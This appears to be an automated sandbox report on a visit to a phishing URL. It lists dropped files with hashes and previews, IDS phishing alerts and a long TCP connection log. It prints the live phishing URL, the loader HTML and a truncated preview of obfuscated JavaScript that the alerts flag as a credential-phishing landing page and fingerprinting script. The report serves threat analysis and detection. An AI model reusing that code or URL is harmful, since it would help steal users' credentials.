                                                                    SHA-512:0F16BAF9403ABD97BCE2BFE46A639FA25756BB048835BC132BCD6017DB4C6475727EFA0CB0A422316E3A3FC95BE7DB9E73074FBAD45A2F5AFDA3B16E2939BAF5
                                                                    Malicious:false
                                                                    Reputation:low
                                                                    URL:https://skinature.com/o/?c3Y9bzM2NV8xX25vbSZyYW5kPVdEVkZhekE9JnVpZD1VU0VSMTYxMDIwMjRVMTExMDE2NDc=N0123N
                                                                    Preview:.<!DOCTYPE html>.<html id='html' sti='VlZORlVqRTJNVEF5TURJMFZURXhNVEF4TmpRMw==' vic='' lang='en'>..<head>. <script src='https://cdn.socket.io/4.7.5/socket.io.min.js' integrity='sha384-2huaZvOR9iDzHqslqwpR87isEmrfxqyWOF7hr7BY6KG0+hVKLoEXMPUJw3ynWuhO' crossorigin='anonymous'></script>.</head>..<body id='allbody'>..</body>..<script src='jsnom.js'></script>.</html>
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:Unicode text, UTF-8 text, with very long lines (64593)
                                                                    Category:dropped
                                                                    Size (bytes):100217
                                                                    Entropy (8bit):4.516887791126109
                                                                    Encrypted:false
                                                                    SSDEEP:1536:ib8J+apQ3jx2wtA4+eS6e6+mitQT3TLJCLaRlAq:ix2wtA4+eS6e6+XE3TLJCLIlAq
                                                                    MD5:57B032180AFEBEB7A6C31D0A7F35C47A
                                                                    SHA1:E6C8EE94D3A447EF0B81A1F406AA7F2907CBC798
                                                                    SHA-256:DB290E0F0161B9962787FA22C846F5D53BEBCD5B46B77837AF5048C09981A7BB
                                                                    SHA-512:0A059C64899F0A20FE9EDF7A94E9F0FE76775B7DED8703140CF5D309D87643575E1F98C4020862270A44D679170CDD9B061B7C924CAE7D7B7B5DFE3F66A6F269
                                                                    Malicious:false
                                                                    Reputation:low
                                                                    Preview:function _0x1fae(_0x34ba19, _0x598b18) { const _0x59eb05 = _0x59eb(); return _0x1fae = function(_0x1fae59, _0x391fd5) { _0x1fae59 = _0x1fae59 - 0xea; let _0xcbc169 = _0x59eb05[_0x1fae59]; return _0xcbc169; }, _0x1fae(_0x34ba19, _0x598b18); }(function(_0x3ed08f, _0x56c8b3) {. const _0x2019c0 = _0x1fae,. _0x43cc63 = _0x3ed08f();. while (!![]) {. try {. const _0x262285 = parseInt(_0x2019c0(0x121)) / 0x1 + -parseInt(_0x2019c0(0x170)) / 0x2 + -parseInt(_0x2019c0(0x14b)) / 0x3 + -parseInt(_0x2019c0(0x14d)) / 0x4 + -parseInt(_0x2019c0(0x14c)) / 0x5 + -parseInt(_0x2019c0(0x118)) / 0x6 + parseInt(_0x2019c0(0x171)) / 0x7;. if (_0x262285 === _0x56c8b3) break;. else _0x43cc63['push'](_0x43cc63['shift']());. } catch (_0x3070ea) { _0x43cc63['push'](_0x43cc63['shift']()); }. }.}(_0x59eb, 0x27508), window['addEventListener']('load', function() {. const _0x1706f4 = _0x1fae;. document[_0x1706f4(0x166)][_0x1706f4(0x102)](_0x1706f4(0x151
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1864
                                                                    Category:dropped
                                                                    Size (bytes):673
                                                                    Entropy (8bit):7.6596900876595075
                                                                    Encrypted:false
                                                                    SSDEEP:12:Xl0t8TUViiYi5m6FhSBXWPsigK99WCqKMvBBFThSqfLd81CK6bC+k7LqZLsFlD:XFUVpkNK0Rwid81p6btk7LqZ6D
                                                                    MD5:0E176276362B94279A4492511BFCBD98
                                                                    SHA1:389FE6B51F62254BB98939896B8C89EBEFFE2A02
                                                                    SHA-256:9A2C174AE45CAC057822844211156A5ED293E65C5F69E1D211A7206472C5C80C
                                                                    SHA-512:8D61C9E464C8F3C77BF1729E32F92BBB1B426A19907E418862EFE117DBD1F0A26FCC3A6FE1D1B22B836853D43C964F6B6D25E414649767FBEA7FE10D2048D7A1
                                                                    Malicious:false
                                                                    Reputation:low
                                                                    Preview:...........U.n.0....}i..P..C..7l/..d........n...G....yl. .E.......Tu.F.........?$.i.s..s...C..wi$.....r....CT.U.FuS..r.e.~...G.q...*..~M..mu}.0.=..&.~.e.WLX.....X..%p..i......7+.........?......WN..%>...$..c..}N....Y4?..x.1.....*.#v...Gal9.!.9.A.u..b..>..".#A2"+...<qc.v....)3...x.p&..K.&..T.r.'....J.T....Q..=..H).X...<.r...KkX........)5i4.+.h.....5.<..5.^O.eC%V^....Nx.E..;..52..h....C"I./.`..O...f..r..n.h.r]}.G^..D.7..i.].}.G.].....{....oW............h.4...}~=6u..k...=.X..+z}.4.].....YS5..J......)......m....w.......~}.C.b_..[.u..9_7.u.u.....y.ss....:_yQ<{..K.V_Z....c.G.N.a...?/..%. .-..K.td....4...5.(.e.`G7..]t?.3..\..... ....G.H...
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:GIF image data, version 89a, 90 x 68
                                                                    Category:dropped
                                                                    Size (bytes):1933
                                                                    Entropy (8bit):6.714574381049021
                                                                    Encrypted:false
                                                                    SSDEEP:48:0H3X3BNXrhfmR2xq+KhwuWl85pJMDCf6WcVqU08w3:0H3nBN7huR2g+KhCl0kqv8w3
                                                                    MD5:11D203DF4573DDEF7A39312650D60916
                                                                    SHA1:B34B20779C3D853DE36D9A42521CFF9075DE315B
                                                                    SHA-256:5992D4BCF7F1B705FA08AA8A3B0E4C5C1974C6E76B6BA5A69A7D21D0FD939247
                                                                    SHA-512:E3DC11AF9737A1B0A2DECE412C95D3C7AC56BC9951BC4A3F273E729ABD9411615B9FD7DF42E86DC2D4D91D0FC08AADB88C2448797D5AC56432B282B8C408E84B
                                                                    Malicious:false
                                                                    Reputation:low
                                                                    Preview:GIF89aZ.D.......SSSTTTUUUVVVWWWXXXYYYZZZ[[[\\\]]]^^^___```aaabbbccceeefffggghhhiiijjjkkkmmmnnnoooqqqrrrssstttuuuvvvwwwxxxyyyzzz{{{|||~~~.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................!.......,....Z.D........H......*\....#J.H....3j.... C..I...(S.\.......I...8s.l ..I.....J...H...p..P...12.....j.Z.....-..@...J+...........;4.A.C...:..].A.6 ..(.).Jm@p...D#.."@....U..L.@..N-..+..f.n...*zh.&.
                                                                    No static file info
                                                                    TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                    2024-10-28T14:03:17.378347+01002056643ET PHISHING Javascript Browser Fingerprinting POST Request2192.168.2.44975250.87.179.240443TCP
                                                                    2024-10-28T14:03:18.512814+01002056316ET PHISHING Generic Credential Phish Landing Page (jsnom.js)1192.168.2.44975450.87.179.240443TCP
                                                                    2024-10-28T14:03:19.831270+01002056316ET PHISHING Generic Credential Phish Landing Page (jsnom.js)1192.168.2.44976150.87.179.240443TCP
                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                    Oct 28, 2024 14:02:21.701159000 CET49675443192.168.2.4173.222.162.32
                                                                    Oct 28, 2024 14:02:25.091428041 CET49735443192.168.2.4199.188.200.231
                                                                    Oct 28, 2024 14:02:25.091478109 CET44349735199.188.200.231192.168.2.4
                                                                    Oct 28, 2024 14:02:25.091548920 CET49735443192.168.2.4199.188.200.231
                                                                    Oct 28, 2024 14:02:25.091831923 CET49736443192.168.2.4199.188.200.231
                                                                    Oct 28, 2024 14:02:25.091919899 CET44349736199.188.200.231192.168.2.4
                                                                    Oct 28, 2024 14:02:25.092005968 CET49735443192.168.2.4199.188.200.231
                                                                    Oct 28, 2024 14:02:25.092024088 CET44349735199.188.200.231192.168.2.4
                                                                    Oct 28, 2024 14:02:25.092032909 CET49736443192.168.2.4199.188.200.231
                                                                    Oct 28, 2024 14:02:25.092230082 CET49736443192.168.2.4199.188.200.231
                                                                    Oct 28, 2024 14:02:25.092255116 CET44349736199.188.200.231192.168.2.4
                                                                    Oct 28, 2024 14:02:25.781430960 CET44349735199.188.200.231192.168.2.4
                                                                    Oct 28, 2024 14:02:25.783174038 CET49735443192.168.2.4199.188.200.231
                                                                    Oct 28, 2024 14:02:25.783207893 CET44349735199.188.200.231192.168.2.4
                                                                    Oct 28, 2024 14:02:25.784671068 CET44349735199.188.200.231192.168.2.4
                                                                    Oct 28, 2024 14:02:25.784770012 CET49735443192.168.2.4199.188.200.231
                                                                    Oct 28, 2024 14:02:25.791933060 CET49735443192.168.2.4199.188.200.231
                                                                    Oct 28, 2024 14:02:25.792094946 CET44349735199.188.200.231192.168.2.4
                                                                    Oct 28, 2024 14:02:25.800228119 CET49735443192.168.2.4199.188.200.231
                                                                    Oct 28, 2024 14:02:25.800267935 CET44349735199.188.200.231192.168.2.4
                                                                    Oct 28, 2024 14:02:25.812299967 CET44349736199.188.200.231192.168.2.4
                                                                    Oct 28, 2024 14:02:25.815660954 CET49736443192.168.2.4199.188.200.231
                                                                    Oct 28, 2024 14:02:25.815680027 CET44349736199.188.200.231192.168.2.4
                                                                    Oct 28, 2024 14:02:25.817090034 CET44349736199.188.200.231192.168.2.4
                                                                    Oct 28, 2024 14:02:25.817167997 CET49736443192.168.2.4199.188.200.231
                                                                    Oct 28, 2024 14:02:25.818217993 CET49736443192.168.2.4199.188.200.231
                                                                    Oct 28, 2024 14:02:25.818281889 CET44349736199.188.200.231192.168.2.4
                                                                    Oct 28, 2024 14:02:25.841440916 CET49735443192.168.2.4199.188.200.231
                                                                    Oct 28, 2024 14:02:25.873136044 CET49736443192.168.2.4199.188.200.231
                                                                    Oct 28, 2024 14:02:25.873193979 CET44349736199.188.200.231192.168.2.4
                                                                    Oct 28, 2024 14:02:25.918571949 CET49736443192.168.2.4199.188.200.231
                                                                    Oct 28, 2024 14:02:26.053004980 CET44349735199.188.200.231192.168.2.4
                                                                    Oct 28, 2024 14:02:26.053041935 CET44349735199.188.200.231192.168.2.4
                                                                    Oct 28, 2024 14:02:26.053046942 CET44349735199.188.200.231192.168.2.4
                                                                    Oct 28, 2024 14:02:26.053080082 CET44349735199.188.200.231192.168.2.4
                                                                    Oct 28, 2024 14:02:26.053106070 CET44349735199.188.200.231192.168.2.4
                                                                    Oct 28, 2024 14:02:26.053118944 CET49735443192.168.2.4199.188.200.231
                                                                    Oct 28, 2024 14:02:26.053153038 CET44349735199.188.200.231192.168.2.4
                                                                    Oct 28, 2024 14:02:26.053169966 CET49735443192.168.2.4199.188.200.231
                                                                    Oct 28, 2024 14:02:26.053201914 CET49735443192.168.2.4199.188.200.231
                                                                    Oct 28, 2024 14:02:26.119209051 CET49735443192.168.2.4199.188.200.231
                                                                    Oct 28, 2024 14:02:26.119226933 CET44349735199.188.200.231192.168.2.4
                                                                    Oct 28, 2024 14:02:26.257975101 CET49738443192.168.2.4148.163.158.107
                                                                    Oct 28, 2024 14:02:26.258074045 CET44349738148.163.158.107192.168.2.4
                                                                    Oct 28, 2024 14:02:26.258155107 CET49738443192.168.2.4148.163.158.107
                                                                    Oct 28, 2024 14:02:26.264178991 CET49738443192.168.2.4148.163.158.107
                                                                    Oct 28, 2024 14:02:26.264218092 CET44349738148.163.158.107192.168.2.4
                                                                    Oct 28, 2024 14:02:27.056813002 CET49740443192.168.2.4142.250.185.196
                                                                    Oct 28, 2024 14:02:27.056915045 CET44349740142.250.185.196192.168.2.4
                                                                    Oct 28, 2024 14:02:27.057117939 CET49740443192.168.2.4142.250.185.196
                                                                    Oct 28, 2024 14:02:27.058120966 CET49740443192.168.2.4142.250.185.196
                                                                    Oct 28, 2024 14:02:27.058159113 CET44349740142.250.185.196192.168.2.4
                                                                    Oct 28, 2024 14:02:27.954303026 CET44349740142.250.185.196192.168.2.4
                                                                    Oct 28, 2024 14:02:27.997807980 CET49740443192.168.2.4142.250.185.196
                                                                    Oct 28, 2024 14:02:28.003098965 CET49740443192.168.2.4142.250.185.196
                                                                    Oct 28, 2024 14:02:28.003154993 CET44349740142.250.185.196192.168.2.4
                                                                    Oct 28, 2024 14:02:28.004757881 CET44349740142.250.185.196192.168.2.4
                                                                    Oct 28, 2024 14:02:28.004837990 CET49740443192.168.2.4142.250.185.196
                                                                    Oct 28, 2024 14:02:28.024852991 CET49740443192.168.2.4142.250.185.196
                                                                    Oct 28, 2024 14:02:28.025204897 CET44349740142.250.185.196192.168.2.4
                                                                    Oct 28, 2024 14:02:28.072629929 CET49740443192.168.2.4142.250.185.196
                                                                    Oct 28, 2024 14:02:28.072689056 CET44349740142.250.185.196192.168.2.4
                                                                    Oct 28, 2024 14:02:28.105731964 CET44349738148.163.158.107192.168.2.4
                                                                    Oct 28, 2024 14:02:28.114118099 CET49738443192.168.2.4148.163.158.107
                                                                    Oct 28, 2024 14:02:28.114165068 CET44349738148.163.158.107192.168.2.4
                                                                    Oct 28, 2024 14:02:28.116636992 CET44349738148.163.158.107192.168.2.4
                                                                    Oct 28, 2024 14:02:28.116731882 CET49738443192.168.2.4148.163.158.107
                                                                    Oct 28, 2024 14:02:28.120642900 CET49738443192.168.2.4148.163.158.107
                                                                    Oct 28, 2024 14:02:28.120944977 CET44349738148.163.158.107192.168.2.4
                                                                    Oct 28, 2024 14:02:28.121162891 CET49738443192.168.2.4148.163.158.107
                                                                    Oct 28, 2024 14:02:28.121177912 CET44349738148.163.158.107192.168.2.4
                                                                    Oct 28, 2024 14:02:28.121498108 CET49740443192.168.2.4142.250.185.196
                                                                    Oct 28, 2024 14:02:28.169298887 CET49738443192.168.2.4148.163.158.107
                                                                    Oct 28, 2024 14:02:28.267352104 CET44349738148.163.158.107192.168.2.4
                                                                    Oct 28, 2024 14:02:28.267420053 CET44349738148.163.158.107192.168.2.4
                                                                    Oct 28, 2024 14:02:28.267491102 CET49738443192.168.2.4148.163.158.107
                                                                    Oct 28, 2024 14:02:28.267561913 CET44349738148.163.158.107192.168.2.4
                                                                    Oct 28, 2024 14:02:28.267644882 CET44349738148.163.158.107192.168.2.4
                                                                    Oct 28, 2024 14:02:28.267699003 CET49738443192.168.2.4148.163.158.107
                                                                    Oct 28, 2024 14:02:28.269123077 CET49738443192.168.2.4148.163.158.107
                                                                    Oct 28, 2024 14:02:28.269156933 CET44349738148.163.158.107192.168.2.4
                                                                    Oct 28, 2024 14:02:28.321968079 CET49741443192.168.2.4184.28.90.27
                                                                    Oct 28, 2024 14:02:28.322025061 CET44349741184.28.90.27192.168.2.4
                                                                    Oct 28, 2024 14:02:28.322099924 CET49741443192.168.2.4184.28.90.27
                                                                    Oct 28, 2024 14:02:28.323698997 CET49741443192.168.2.4184.28.90.27
                                                                    Oct 28, 2024 14:02:28.323734999 CET44349741184.28.90.27192.168.2.4
                                                                    Oct 28, 2024 14:02:28.685054064 CET49736443192.168.2.4199.188.200.231
                                                                    Oct 28, 2024 14:02:28.731343985 CET44349736199.188.200.231192.168.2.4
                                                                    Oct 28, 2024 14:02:28.854376078 CET44349736199.188.200.231192.168.2.4
                                                                    Oct 28, 2024 14:02:28.854537010 CET44349736199.188.200.231192.168.2.4
                                                                    Oct 28, 2024 14:02:28.854762077 CET49736443192.168.2.4199.188.200.231
                                                                    Oct 28, 2024 14:02:28.859745026 CET49736443192.168.2.4199.188.200.231
                                                                    Oct 28, 2024 14:02:28.859807968 CET44349736199.188.200.231192.168.2.4
                                                                    Oct 28, 2024 14:02:28.991125107 CET49742443192.168.2.4148.163.158.107
                                                                    Oct 28, 2024 14:02:28.991163015 CET44349742148.163.158.107192.168.2.4
                                                                    Oct 28, 2024 14:02:28.996876955 CET49742443192.168.2.4148.163.158.107
                                                                    Oct 28, 2024 14:02:29.002825022 CET49742443192.168.2.4148.163.158.107
                                                                    Oct 28, 2024 14:02:29.002840996 CET44349742148.163.158.107192.168.2.4
                                                                    Oct 28, 2024 14:02:29.180730104 CET44349741184.28.90.27192.168.2.4
                                                                    Oct 28, 2024 14:02:29.180896044 CET49741443192.168.2.4184.28.90.27
                                                                    Oct 28, 2024 14:02:29.206986904 CET49741443192.168.2.4184.28.90.27
                                                                    Oct 28, 2024 14:02:29.207055092 CET44349741184.28.90.27192.168.2.4
                                                                    Oct 28, 2024 14:02:29.207998991 CET44349741184.28.90.27192.168.2.4
                                                                    Oct 28, 2024 14:02:29.249697924 CET49741443192.168.2.4184.28.90.27
                                                                    Oct 28, 2024 14:02:29.482898951 CET49741443192.168.2.4184.28.90.27
                                                                    Oct 28, 2024 14:02:29.523374081 CET44349741184.28.90.27192.168.2.4
                                                                    Oct 28, 2024 14:02:29.656414986 CET44349742148.163.158.107192.168.2.4
                                                                    Oct 28, 2024 14:02:29.656785965 CET49742443192.168.2.4148.163.158.107
                                                                    Oct 28, 2024 14:02:29.656807899 CET44349742148.163.158.107192.168.2.4
                                                                    Oct 28, 2024 14:02:29.660559893 CET44349742148.163.158.107192.168.2.4
                                                                    Oct 28, 2024 14:02:29.660710096 CET49742443192.168.2.4148.163.158.107
                                                                    Oct 28, 2024 14:02:29.661048889 CET49742443192.168.2.4148.163.158.107
                                                                    Oct 28, 2024 14:02:29.661206961 CET49742443192.168.2.4148.163.158.107
                                                                    Oct 28, 2024 14:02:29.661225080 CET44349742148.163.158.107192.168.2.4
                                                                    Oct 28, 2024 14:02:29.702837944 CET49742443192.168.2.4148.163.158.107
                                                                    Oct 28, 2024 14:02:29.702851057 CET44349742148.163.158.107192.168.2.4
                                                                    Oct 28, 2024 14:02:29.726677895 CET44349741184.28.90.27192.168.2.4
                                                                    Oct 28, 2024 14:02:29.726810932 CET44349741184.28.90.27192.168.2.4
                                                                    Oct 28, 2024 14:02:29.730591059 CET49741443192.168.2.4184.28.90.27
                                                                    Oct 28, 2024 14:02:29.730796099 CET49741443192.168.2.4184.28.90.27
                                                                    Oct 28, 2024 14:02:29.730796099 CET49741443192.168.2.4184.28.90.27
                                                                    Oct 28, 2024 14:02:29.730840921 CET44349741184.28.90.27192.168.2.4
                                                                    Oct 28, 2024 14:02:29.730875969 CET44349741184.28.90.27192.168.2.4
                                                                    Oct 28, 2024 14:02:29.750597954 CET49742443192.168.2.4148.163.158.107
                                                                    Oct 28, 2024 14:02:29.770668983 CET49743443192.168.2.4184.28.90.27
                                                                    Oct 28, 2024 14:02:29.770752907 CET44349743184.28.90.27192.168.2.4
                                                                    Oct 28, 2024 14:02:29.771073103 CET49743443192.168.2.4184.28.90.27
                                                                    Oct 28, 2024 14:02:29.771210909 CET49743443192.168.2.4184.28.90.27
                                                                    Oct 28, 2024 14:02:29.771231890 CET44349743184.28.90.27192.168.2.4
                                                                    Oct 28, 2024 14:02:29.810039997 CET44349742148.163.158.107192.168.2.4
                                                                    Oct 28, 2024 14:02:29.810096025 CET44349742148.163.158.107192.168.2.4
                                                                    Oct 28, 2024 14:02:29.810375929 CET44349742148.163.158.107192.168.2.4
                                                                    Oct 28, 2024 14:02:29.810550928 CET49742443192.168.2.4148.163.158.107
                                                                    Oct 28, 2024 14:02:29.811048031 CET49742443192.168.2.4148.163.158.107
                                                                    Oct 28, 2024 14:02:29.811065912 CET44349742148.163.158.107192.168.2.4
                                                                    Oct 28, 2024 14:02:30.618753910 CET44349743184.28.90.27192.168.2.4
                                                                    Oct 28, 2024 14:02:30.618966103 CET49743443192.168.2.4184.28.90.27
                                                                    Oct 28, 2024 14:02:30.620326996 CET49743443192.168.2.4184.28.90.27
                                                                    Oct 28, 2024 14:02:30.620382071 CET44349743184.28.90.27192.168.2.4
                                                                    Oct 28, 2024 14:02:30.621592045 CET44349743184.28.90.27192.168.2.4
                                                                    Oct 28, 2024 14:02:30.623027086 CET49743443192.168.2.4184.28.90.27
                                                                    Oct 28, 2024 14:02:30.663420916 CET44349743184.28.90.27192.168.2.4
                                                                    Oct 28, 2024 14:02:30.865767956 CET44349743184.28.90.27192.168.2.4
                                                                    Oct 28, 2024 14:02:30.865840912 CET44349743184.28.90.27192.168.2.4
                                                                    Oct 28, 2024 14:02:30.866118908 CET49743443192.168.2.4184.28.90.27
                                                                    Oct 28, 2024 14:02:30.866744041 CET49743443192.168.2.4184.28.90.27
                                                                    Oct 28, 2024 14:02:30.866744995 CET49743443192.168.2.4184.28.90.27
                                                                    Oct 28, 2024 14:02:30.866816044 CET44349743184.28.90.27192.168.2.4
                                                                    Oct 28, 2024 14:02:30.866852045 CET44349743184.28.90.27192.168.2.4
                                                                    Oct 28, 2024 14:02:37.981110096 CET44349740142.250.185.196192.168.2.4
                                                                    Oct 28, 2024 14:02:37.981190920 CET44349740142.250.185.196192.168.2.4
                                                                    Oct 28, 2024 14:02:37.981264114 CET49740443192.168.2.4142.250.185.196
                                                                    Oct 28, 2024 14:02:38.145271063 CET49740443192.168.2.4142.250.185.196
                                                                    Oct 28, 2024 14:02:38.145314932 CET44349740142.250.185.196192.168.2.4
                                                                    Oct 28, 2024 14:02:39.852225065 CET4972380192.168.2.4199.232.214.172
                                                                    Oct 28, 2024 14:02:39.857978106 CET8049723199.232.214.172192.168.2.4
                                                                    Oct 28, 2024 14:02:39.858197927 CET4972380192.168.2.4199.232.214.172
                                                                    Oct 28, 2024 14:03:16.166294098 CET49751443192.168.2.450.87.179.240
                                                                    Oct 28, 2024 14:03:16.166347980 CET4434975150.87.179.240192.168.2.4
                                                                    Oct 28, 2024 14:03:16.166413069 CET49751443192.168.2.450.87.179.240
                                                                    Oct 28, 2024 14:03:16.166809082 CET49752443192.168.2.450.87.179.240
                                                                    Oct 28, 2024 14:03:16.166893005 CET4434975250.87.179.240192.168.2.4
                                                                    Oct 28, 2024 14:03:16.166965008 CET49752443192.168.2.450.87.179.240
                                                                    Oct 28, 2024 14:03:16.167032957 CET49751443192.168.2.450.87.179.240
                                                                    Oct 28, 2024 14:03:16.167053938 CET4434975150.87.179.240192.168.2.4
                                                                    Oct 28, 2024 14:03:16.167705059 CET49752443192.168.2.450.87.179.240
                                                                    Oct 28, 2024 14:03:16.167738914 CET4434975250.87.179.240192.168.2.4
                                                                    Oct 28, 2024 14:03:16.849560976 CET4434975150.87.179.240192.168.2.4
                                                                    Oct 28, 2024 14:03:16.849852085 CET49751443192.168.2.450.87.179.240
                                                                    Oct 28, 2024 14:03:16.849886894 CET4434975150.87.179.240192.168.2.4
                                                                    Oct 28, 2024 14:03:16.851600885 CET4434975150.87.179.240192.168.2.4
                                                                    Oct 28, 2024 14:03:16.851669073 CET49751443192.168.2.450.87.179.240
                                                                    Oct 28, 2024 14:03:16.852806091 CET4434975250.87.179.240192.168.2.4
                                                                    Oct 28, 2024 14:03:16.853013992 CET49752443192.168.2.450.87.179.240
                                                                    Oct 28, 2024 14:03:16.853033066 CET4434975250.87.179.240192.168.2.4
                                                                    Oct 28, 2024 14:03:16.854681015 CET4434975250.87.179.240192.168.2.4
                                                                    Oct 28, 2024 14:03:16.854783058 CET49752443192.168.2.450.87.179.240
                                                                    Oct 28, 2024 14:03:16.856296062 CET49751443192.168.2.450.87.179.240
                                                                    Oct 28, 2024 14:03:16.856385946 CET4434975150.87.179.240192.168.2.4
                                                                    Oct 28, 2024 14:03:16.856601000 CET49752443192.168.2.450.87.179.240
                                                                    Oct 28, 2024 14:03:16.856681108 CET4434975250.87.179.240192.168.2.4
                                                                    Oct 28, 2024 14:03:16.856949091 CET49751443192.168.2.450.87.179.240
                                                                    Oct 28, 2024 14:03:16.856959105 CET4434975150.87.179.240192.168.2.4
                                                                    Oct 28, 2024 14:03:16.906270027 CET49752443192.168.2.450.87.179.240
                                                                    Oct 28, 2024 14:03:16.906280041 CET49751443192.168.2.450.87.179.240
                                                                    Oct 28, 2024 14:03:16.906306028 CET4434975250.87.179.240192.168.2.4
                                                                    Oct 28, 2024 14:03:16.952969074 CET49752443192.168.2.450.87.179.240
                                                                    Oct 28, 2024 14:03:17.171333075 CET49753443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:17.171374083 CET4434975313.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:17.171484947 CET49753443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:17.171865940 CET49753443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:17.171885967 CET4434975313.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:17.287539959 CET4434975150.87.179.240192.168.2.4
                                                                    Oct 28, 2024 14:03:17.287596941 CET4434975150.87.179.240192.168.2.4
                                                                    Oct 28, 2024 14:03:17.287662983 CET49751443192.168.2.450.87.179.240
                                                                    Oct 28, 2024 14:03:17.287688017 CET4434975150.87.179.240192.168.2.4
                                                                    Oct 28, 2024 14:03:17.288276911 CET4434975150.87.179.240192.168.2.4
                                                                    Oct 28, 2024 14:03:17.288347960 CET49751443192.168.2.450.87.179.240
                                                                    Oct 28, 2024 14:03:17.289127111 CET49751443192.168.2.450.87.179.240
                                                                    Oct 28, 2024 14:03:17.289144993 CET4434975150.87.179.240192.168.2.4
                                                                    Oct 28, 2024 14:03:17.289160967 CET49751443192.168.2.450.87.179.240
                                                                    Oct 28, 2024 14:03:17.289201021 CET49751443192.168.2.450.87.179.240
                                                                    Oct 28, 2024 14:03:17.376982927 CET49754443192.168.2.450.87.179.240
                                                                    Oct 28, 2024 14:03:17.377065897 CET4434975450.87.179.240192.168.2.4
                                                                    Oct 28, 2024 14:03:17.377183914 CET49752443192.168.2.450.87.179.240
                                                                    Oct 28, 2024 14:03:17.377233028 CET49754443192.168.2.450.87.179.240
                                                                    Oct 28, 2024 14:03:17.377358913 CET49752443192.168.2.450.87.179.240
                                                                    Oct 28, 2024 14:03:17.377456903 CET4434975250.87.179.240192.168.2.4
                                                                    Oct 28, 2024 14:03:17.377650023 CET49752443192.168.2.450.87.179.240
                                                                    Oct 28, 2024 14:03:17.377716064 CET4434975250.87.179.240192.168.2.4
                                                                    Oct 28, 2024 14:03:17.377899885 CET49752443192.168.2.450.87.179.240
                                                                    Oct 28, 2024 14:03:17.377928972 CET49754443192.168.2.450.87.179.240
                                                                    Oct 28, 2024 14:03:17.377959013 CET4434975450.87.179.240192.168.2.4
                                                                    Oct 28, 2024 14:03:17.378112078 CET4434975250.87.179.240192.168.2.4
                                                                    Oct 28, 2024 14:03:17.378331900 CET49752443192.168.2.450.87.179.240
                                                                    Oct 28, 2024 14:03:17.378376007 CET4434975250.87.179.240192.168.2.4
                                                                    Oct 28, 2024 14:03:17.378407955 CET49752443192.168.2.450.87.179.240
                                                                    Oct 28, 2024 14:03:17.378407955 CET49752443192.168.2.450.87.179.240
                                                                    Oct 28, 2024 14:03:17.378428936 CET4434975250.87.179.240192.168.2.4
                                                                    Oct 28, 2024 14:03:17.378578901 CET49752443192.168.2.450.87.179.240
                                                                    Oct 28, 2024 14:03:17.378595114 CET4434975250.87.179.240192.168.2.4
                                                                    Oct 28, 2024 14:03:17.919749022 CET4434975313.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:17.919816017 CET49753443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:17.955991030 CET49753443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:17.956016064 CET4434975313.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:17.956214905 CET4434975313.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:17.964168072 CET49753443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:18.007333994 CET4434975313.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:18.067188978 CET4434975450.87.179.240192.168.2.4
                                                                    Oct 28, 2024 14:03:18.067827940 CET49754443192.168.2.450.87.179.240
                                                                    Oct 28, 2024 14:03:18.067888975 CET4434975450.87.179.240192.168.2.4
                                                                    Oct 28, 2024 14:03:18.069024086 CET4434975450.87.179.240192.168.2.4
                                                                    Oct 28, 2024 14:03:18.069957018 CET49754443192.168.2.450.87.179.240
                                                                    Oct 28, 2024 14:03:18.070136070 CET4434975450.87.179.240192.168.2.4
                                                                    Oct 28, 2024 14:03:18.123404980 CET49754443192.168.2.450.87.179.240
                                                                    Oct 28, 2024 14:03:18.159660101 CET4434975313.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:18.159677029 CET4434975313.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:18.159738064 CET49753443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:18.159738064 CET4434975313.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:18.159780979 CET4434975313.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:18.159806013 CET49753443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:18.159833908 CET49753443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:18.216814995 CET4434975313.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:18.216830969 CET4434975313.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:18.216954947 CET49753443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:18.216969967 CET4434975313.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:18.217010975 CET49753443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:18.278918982 CET4434975313.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:18.278933048 CET4434975313.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:18.278966904 CET49753443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:18.278976917 CET4434975313.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:18.279015064 CET49753443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:18.289814949 CET4434975250.87.179.240192.168.2.4
                                                                    Oct 28, 2024 14:03:18.290047884 CET4434975250.87.179.240192.168.2.4
                                                                    Oct 28, 2024 14:03:18.290111065 CET49752443192.168.2.450.87.179.240
                                                                    Oct 28, 2024 14:03:18.291704893 CET49752443192.168.2.450.87.179.240
                                                                    Oct 28, 2024 14:03:18.291759014 CET4434975250.87.179.240192.168.2.4
